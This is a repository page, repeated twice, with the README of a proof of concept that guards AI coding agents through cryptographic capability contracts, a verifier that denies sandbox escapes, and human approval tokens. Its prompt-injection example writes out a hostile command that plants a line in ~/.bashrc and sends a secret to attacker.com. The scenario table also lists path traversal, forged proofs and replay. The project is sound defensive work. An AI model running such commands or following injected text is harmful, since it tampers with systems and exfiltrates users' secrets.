lucadilo/ebpca-ai

TypeScript

0

3 commits

updated Oct 1, 2026

See the code

See what people are saying

SourceMessageScoreDate

An architecture to cryptographically constrain autonomous AI agents at the execution boundary (r/LocalLLaMA)

Hi everyone, As we move from simple RAG chat to fully autonomous tool-using and coding agents, we are hitting a massive wall: **predictability and safety.** Right now, most setups try to secure AI agents using *probabilistic* methods like system prompt hardening, alignment tuning or reactive…

2

Oct 6, 2026

README

EBP-CA POC

Execution-Boundary Proofs with Cryptographic Authorization (EBP-CA)
Proof-of-concept demonstrating a novel architecture for preventing AI agent sandbox escapes.

Idea

Instead of relying on the AI model to “obey rules”, EBP-CA requires every proposed action to carry a verifiable proof that it respects:

  • a Capability Contract (CBC) defining what the agent is allowed to do;
  • an Execution-Boundary Language (EBL) formally describing safety constraints (filesystem, network, economic cost, physical impact).

A minimal Micro-Verifier (MV) checks these proofs mechanically. If the proof fails, the action is never executed—regardless of what the model “intended”.

What this POC demonstrates

A coding agent is allowed to:

  • write relative paths through a named, writable directory capability rooted at /sandbox;
  • invoke only named executable capabilities, and only with an exactly allow-listed argv, with no shell;
  • request only named HTTPS endpoint capabilities (e.g., example-api);
  • spend at most max_economic_cost_cents and perform at most max_actions_per_session actions;
  • run high-impact operations only with a human approval token signed by an approver listed in the contract.

Cost and approval requirements are properties of the signed operation, not values the agent declares, so an agent cannot under-report the impact of what it is asking for.

A prompt injection tricks the agent into proposing:

echo "backdoor" > ~/.bashrc && curl https://attacker.com/exfil?data=secret

This command writes outside the sandbox and calls a forbidden domain.

Without EBP-CA

  • The agent proposes the malicious command.
  • The executor runs it directly (simulated).
  • Result: sandbox escape (violation).

With EBP-CA

npm run start:ebpca runs 14 scenarios, three legitimate and eleven hostile:

#ScenarioOutcome
1npm test inside the boundaryALLOW
2Prompt-injected shell actionDENY - unknown executable capability, argv and endpoint
3Agent forges its own proof (all checks true)DENY - proof != recomputation
4Proof of a legitimate action reused for another oneDENY - action binding
5workspace:../../etc/passwdDENY - path traversal
6workspace:../sandbox-attacker/payload.shDENY - capability escape
7npm plus injected argv and URLDENY - argv not allow-listed + endpoint
8Expired Capability ContractDENY - validity window
9Malformed JSON crafted to crash the verifierDENY - input validation
10High-impact deploy without approvalDENY - human approval required
11Same deploy with a valid approval tokenALLOW
12-13Two costly actionsALLOW then DENY - session budget
14Same valid proof submitted twiceALLOW then DENY - nonce replay

For every ALLOW, the MV issues a signed, 30-second, single-use execution grant bound to the action and CBC. The executor accepts no action without that grant, rechecks the boundary, resolves capability IDs to trusted paths and consumes the grant. Every decision, grant ID and execution outcome is recorded in a hash-chained audit log.

Trust model

The key property is that the proof carried by the agent is never trusted. It is only a claim. The Micro-Verifier:

  1. treats the submission as untrusted JSON and validates its structure, rejecting unknown fields, so hostile input produces a deny instead of an exception;
  2. validates the contract structure and verifies its Ed25519 signature (over a SHA-256 digest of a canonical JSON serialization, so key ordering cannot change the hash);
  3. checks that the proof is bound to this contract (cbc_hash) and to this action (action_hash), which defeats proof swapping and replay;
  4. checks the validity window, proof age and the single-use nonce;
  5. recomputes every EBL check itself from the action it received;
  6. compares its own result with the agent's claim - a mismatch is reported as a forged proof;
  7. derives cost and approval requirements from the signed capability, enforces the session budget and action limit, and requires a human approval token for high-impact operations;
  8. issues a short-lived Ed25519 execution grant only after every check passes.

verifyAction is a total function: it returns a decision for any input, including null, arrays, wrong types and unknown fields.

Installation

npm install

Usage

npm run start:no-ebpca   # no verification: sandbox escape
npm run start:ebpca      # full verification: every violation blocked
npm run start:ebpca -- --verbose   # also print each Proof-Carrying Action
npm test                 # boundary and trust-model test suite
npm run typecheck

Project structure

  • src/cbc.ts - Capability Contract (CBC) and its Ed25519 signing/verification
  • src/validate.ts - structural validation of untrusted submissions and of contracts
  • src/canonical.ts - canonical serialization and SHA-256 digests
  • src/ebl.ts - structured actions and checks for directory, executable, argv and network capabilities
  • src/pca.ts - PCA generator (checks + cryptographic bindings)
  • src/mv.ts - Micro-Verifier and signed execution-grant issuer
  • src/approval.ts - human approval tokens for high-impact operations
  • src/executor.ts - grant-validating, capability-resolving simulated executor
  • src/session.ts - budget reservation, action count and expiring replay protection
  • src/audit.ts - hash-chained audit receipts
  • src/index.ts - POC entry point
  • tests/security.test.ts - boundary, trust-model, grant and audit tests
  • tests/ebpca.test.ts - input validation, contract validation, cost, approval and replay tests

Security note

This POC does not actually execute shell commands. It only simulates execution via console.log to safely demonstrate the concept.

Known limitations, deliberately out of scope:

  • Path checks are POSIX-only and purely lexical: a real executor must resolve symlinks (realpath) and re-check after resolution (TOCTOU).
  • URL arguments are matched to named endpoint capabilities, but real egress must be default-deny and enforced outside the agent by the network layer. Argument inspection is defence in depth; the exact argv allow-list is the real control.
  • Executable digests are deployment placeholders in this simulation. A real executor must hash the opened binary and execute that same file descriptor.
  • Budget is reserved at authorization and settled by the caller after execution; a crashed broker leaves a reservation held until the session ends.
  • The authority key pair is generated in-process; a real deployment keeps the private keys in an HSM/KMS and distributes only public keys.

Future extensions

  • Integration with an SMT solver (e.g., Z3) for richer proofs.
  • Replace the simulated executor with a broker outside the agent sandbox, using execve/execFile without a shell inside a microVM with seccomp and cgroups.
  • Externalized, replicated audit ledger.
  • Support for more action types and richer EBL constraints.

License

Copyright (c) 2026 Luca Di Lorenzo. All rights reserved.

This is proprietary software. No use, execution, copying, modification, distribution or other exploitation is permitted without the copyright holder's prior express written permission. See LICENSE for the complete terms.

lucadilo/ebpca-ai

TypeScript

0

3 commits

updated Oct 1, 2026

See the code

See what people are saying

SourceMessageScoreDate

An architecture to cryptographically constrain autonomous AI agents at the execution boundary (r/LocalLLaMA)

Hi everyone, As we move from simple RAG chat to fully autonomous tool-using and coding agents, we are hitting a massive wall: **predictability and safety.** Right now, most setups try to secure AI agents using *probabilistic* methods like system prompt hardening, alignment tuning or reactive…

2

Oct 6, 2026

README

EBP-CA POC

Execution-Boundary Proofs with Cryptographic Authorization (EBP-CA)
Proof-of-concept demonstrating a novel architecture for preventing AI agent sandbox escapes.

Idea

Instead of relying on the AI model to “obey rules”, EBP-CA requires every proposed action to carry a verifiable proof that it respects:

  • a Capability Contract (CBC) defining what the agent is allowed to do;
  • an Execution-Boundary Language (EBL) formally describing safety constraints (filesystem, network, economic cost, physical impact).

A minimal Micro-Verifier (MV) checks these proofs mechanically. If the proof fails, the action is never executed—regardless of what the model “intended”.

What this POC demonstrates

A coding agent is allowed to:

  • write relative paths through a named, writable directory capability rooted at /sandbox;
  • invoke only named executable capabilities, and only with an exactly allow-listed argv, with no shell;
  • request only named HTTPS endpoint capabilities (e.g., example-api);
  • spend at most max_economic_cost_cents and perform at most max_actions_per_session actions;
  • run high-impact operations only with a human approval token signed by an approver listed in the contract.

Cost and approval requirements are properties of the signed operation, not values the agent declares, so an agent cannot under-report the impact of what it is asking for.

A prompt injection tricks the agent into proposing:

echo "backdoor" > ~/.bashrc && curl https://attacker.com/exfil?data=secret

This command writes outside the sandbox and calls a forbidden domain.

Without EBP-CA

  • The agent proposes the malicious command.
  • The executor runs it directly (simulated).
  • Result: sandbox escape (violation).

With EBP-CA

npm run start:ebpca runs 14 scenarios, three legitimate and eleven hostile:

#ScenarioOutcome
1npm test inside the boundaryALLOW
2Prompt-injected shell actionDENY - unknown executable capability, argv and endpoint
3Agent forges its own proof (all checks true)DENY - proof != recomputation
4Proof of a legitimate action reused for another oneDENY - action binding
5workspace:../../etc/passwdDENY - path traversal
6workspace:../sandbox-attacker/payload.shDENY - capability escape
7npm plus injected argv and URLDENY - argv not allow-listed + endpoint
8Expired Capability ContractDENY - validity window
9Malformed JSON crafted to crash the verifierDENY - input validation
10High-impact deploy without approvalDENY - human approval required
11Same deploy with a valid approval tokenALLOW
12-13Two costly actionsALLOW then DENY - session budget
14Same valid proof submitted twiceALLOW then DENY - nonce replay

For every ALLOW, the MV issues a signed, 30-second, single-use execution grant bound to the action and CBC. The executor accepts no action without that grant, rechecks the boundary, resolves capability IDs to trusted paths and consumes the grant. Every decision, grant ID and execution outcome is recorded in a hash-chained audit log.

Trust model

The key property is that the proof carried by the agent is never trusted. It is only a claim. The Micro-Verifier:

  1. treats the submission as untrusted JSON and validates its structure, rejecting unknown fields, so hostile input produces a deny instead of an exception;
  2. validates the contract structure and verifies its Ed25519 signature (over a SHA-256 digest of a canonical JSON serialization, so key ordering cannot change the hash);
  3. checks that the proof is bound to this contract (cbc_hash) and to this action (action_hash), which defeats proof swapping and replay;
  4. checks the validity window, proof age and the single-use nonce;
  5. recomputes every EBL check itself from the action it received;
  6. compares its own result with the agent's claim - a mismatch is reported as a forged proof;
  7. derives cost and approval requirements from the signed capability, enforces the session budget and action limit, and requires a human approval token for high-impact operations;
  8. issues a short-lived Ed25519 execution grant only after every check passes.

verifyAction is a total function: it returns a decision for any input, including null, arrays, wrong types and unknown fields.

Installation

npm install

Usage

npm run start:no-ebpca   # no verification: sandbox escape
npm run start:ebpca      # full verification: every violation blocked
npm run start:ebpca -- --verbose   # also print each Proof-Carrying Action
npm test                 # boundary and trust-model test suite
npm run typecheck

Project structure

  • src/cbc.ts - Capability Contract (CBC) and its Ed25519 signing/verification
  • src/validate.ts - structural validation of untrusted submissions and of contracts
  • src/canonical.ts - canonical serialization and SHA-256 digests
  • src/ebl.ts - structured actions and checks for directory, executable, argv and network capabilities
  • src/pca.ts - PCA generator (checks + cryptographic bindings)
  • src/mv.ts - Micro-Verifier and signed execution-grant issuer
  • src/approval.ts - human approval tokens for high-impact operations
  • src/executor.ts - grant-validating, capability-resolving simulated executor
  • src/session.ts - budget reservation, action count and expiring replay protection
  • src/audit.ts - hash-chained audit receipts
  • src/index.ts - POC entry point
  • tests/security.test.ts - boundary, trust-model, grant and audit tests
  • tests/ebpca.test.ts - input validation, contract validation, cost, approval and replay tests

Security note

This POC does not actually execute shell commands. It only simulates execution via console.log to safely demonstrate the concept.

Known limitations, deliberately out of scope:

  • Path checks are POSIX-only and purely lexical: a real executor must resolve symlinks (realpath) and re-check after resolution (TOCTOU).
  • URL arguments are matched to named endpoint capabilities, but real egress must be default-deny and enforced outside the agent by the network layer. Argument inspection is defence in depth; the exact argv allow-list is the real control.
  • Executable digests are deployment placeholders in this simulation. A real executor must hash the opened binary and execute that same file descriptor.
  • Budget is reserved at authorization and settled by the caller after execution; a crashed broker leaves a reservation held until the session ends.
  • The authority key pair is generated in-process; a real deployment keeps the private keys in an HSM/KMS and distributes only public keys.

Future extensions

  • Integration with an SMT solver (e.g., Z3) for richer proofs.
  • Replace the simulated executor with a broker outside the agent sandbox, using execve/execFile without a shell inside a microVM with seccomp and cgroups.
  • Externalized, replicated audit ledger.
  • Support for more action types and richer EBL constraints.

License

Copyright (c) 2026 Luca Di Lorenzo. All rights reserved.

This is proprietary software. No use, execution, copying, modification, distribution or other exploitation is permitted without the copyright holder's prior express written permission. See LICENSE for the complete terms.